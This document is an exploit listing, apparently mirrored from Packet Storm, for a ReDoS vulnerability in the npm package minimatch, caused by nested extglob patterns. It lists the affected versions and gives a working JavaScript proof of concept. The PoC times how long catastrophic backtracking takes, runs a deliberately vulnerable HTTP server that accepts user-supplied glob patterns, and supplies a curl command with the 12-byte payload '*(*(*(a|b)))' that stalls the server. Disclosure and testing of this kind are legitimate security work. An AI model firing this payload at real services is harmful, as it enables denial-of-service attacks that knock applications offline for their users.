Share
## https://sploitus.com/exploit?id=PACKETSTORM:216679
=============================================================================================================================================
    | # Title     : minimatch ReDoS Leading to Event Loop                                                                                       |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits)                                                            |
    | # Vendor    : https://www.npmjs.com/package/minimatch                                                                                     |
    =============================================================================================================================================
    
    [+] Summary    :  A critical Regular Expression Denial of Service (ReDoS) vulnerability exists in minimatch prior to versions:
    
    10.2.3
    
    9.0.7
    
    8.0.6
    
    7.4.8
    
    6.2.2
    
    5.1.8
    
    4.2.5
    
    3.1.4
    
    The issue arises when nested *() or +() extglobs are converted into JavaScript RegExp objects containing nested unbounded quantifiers, such as: (?:(?:a|b)*)*
    
    These expressions trigger catastrophic backtracking in the V8 JavaScript engine.
    
    A minimal 12-byte pattern: *(*(*(a|b)))
    
    combined with an 18-byte non-matching input string is sufficient to cause minimatch() to stall for over 7 seconds. Slightly increasing nesting depth or input length can escalate execution time to minutes.
    
    This vulnerability is particularly severe because:
    
    It is triggered via the default minimatch() API
    
    No special options are required
    
    The minimum viable exploit pattern is only 12 bytes
    
    Both *() and +() extglobs are affected
    
    [+] POC   :   npm install minimatch@10.2.2
    
    import http from 'node:http';
    import { minimatch } from 'minimatch';
    
    console.log("--- Starting ReDoS Backtracking Test ---");
    
    const pattern = "*(*(*(a|b)))"; 
    
    const testBacktracking = (n) => {
        const payload = "a".repeat(n) + "z"; 
        const start = performance.now();
        minimatch(payload, pattern); 
        
        const end = performance.now();
        console.log(`[+] Input length (a x ${n}): Took ${(end - start).toFixed(2)}ms`);
    };
    
    testBacktracking(15);
    testBacktracking(20);
    testBacktracking(23); 
    
    console.log("\n--- Starting Vulnerable Web Server (Port 3000) ---");
    const server = http.createServer((req, res) => {
        const url = new URL(req.url, `http://localhost:3000`);
        const userPattern = url.searchParams.get('pattern');
        const userPath = url.searchParams.get('path');
    
        if (userPattern && userPath) {
            console.log(`[!] Processing potentially malicious request...`);
            const start = Date.now();
            const result = minimatch(userPath, userPattern);      
            const duration = Date.now() - start;
            res.writeHead(200, { 'Content-Type': 'application/json' });
            res.end(JSON.stringify({ matchResult: result, duration: `${duration}ms` }));
        } else {
            res.writeHead(200, { 'Content-Type': 'text/plain' });
            res.end("Server is running. Send 'pattern' and 'path' parameters to test.");
        }
    });
    
    server.listen(3000, () => {
        console.log("Server is ready! To trigger the DoS, use this curl command:");
        console.log('curl "http://localhost:3000/?pattern=*(*(*(a|b)))&path=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaz"');
    });
    	
    Greetings to :==============================================================================
    jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
    ============================================================================================